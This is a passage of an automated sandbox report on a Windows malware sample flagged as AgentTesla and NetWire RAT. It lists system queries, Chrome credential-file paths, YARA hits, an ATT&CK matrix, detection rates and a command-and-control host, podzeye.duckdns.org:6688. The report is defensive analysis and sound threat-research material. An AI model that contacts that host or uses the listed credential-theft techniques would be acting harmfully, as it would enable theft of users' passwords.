                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_004130E8 GetUserNameW | 9_2_004130E8

Stealing of Sensitive Information:

Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: %s\Google\Chrome\User Data\Default\Login Data | 9_2_0040F281
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: %s\Chromium\User Data\Default\Login Data | 9_2_0040F382

Remote Access Functionality:

Yara detected NetWire RAT
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.g94e4BgSRN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.g94e4BgSRN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.g94e4BgSRN.exe.3873c18.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.g94e4BgSRN.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.g94e4BgSRN.exe.389be38.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.283998783.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.279964505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: g94e4BgSRN.exe PID: 6384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: g94e4BgSRN.exe PID: 6976, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 112 | Masquerading 1 | OS Credential Dumping 1 | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 11 | Credentials In Files 1 | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 21 | Security Account Manager | Virtualization/Sandbox Evasion 21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 21 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 13 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
g94e4BgSRN.exe | 49% | Virustotal |
g94e4BgSRN.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\SiEKNQVnm.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
9.0.g94e4BgSRN.exe.400000.14.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.18.unpack | 100% | Avira | TR/Spy.Gen
0.2.g94e4BgSRN.exe.3873c18.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
9.0.g94e4BgSRN.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.16.unpack | 100% | Avira | TR/Spy.Gen
9.0.g94e4BgSRN.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen
9.2.g94e4BgSRN.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
0.2.g94e4BgSRN.exe.389be38.6.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains

Source | Detection | Scanner | Label
podzeye.duckdns.org | 6% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0n1 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0n | 0% | Avira URL Cloud | safe
http://www.yandex.comsocks= | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/0 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/n-u | 0% | URL Reputation | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://www.fontbureau.comceTFp | 0% | Avira URL Cloud | safe
http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
http://www.carterandcone.como.2K- | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.carterandcone.como. | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.carterandcone.comTC | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
podzeye.duckdns.org:6688 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.come | 0% | URL Reputation | safe
http://www.carterandcone.como.)K | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/k | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/f | 0% | URL Reputation | safe
http://www.tiro.comlar? | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn) | 0% | URL Reputation | safe
http://www.founder.com.cn/cn# | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
podzeye.duckdns.org | 109.205.178.244 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
podzeye.duckdns.org:6688 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/Y0n1 | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249404999.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249294569.00000000057FE000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249341645.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249888666.00000000057F4000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
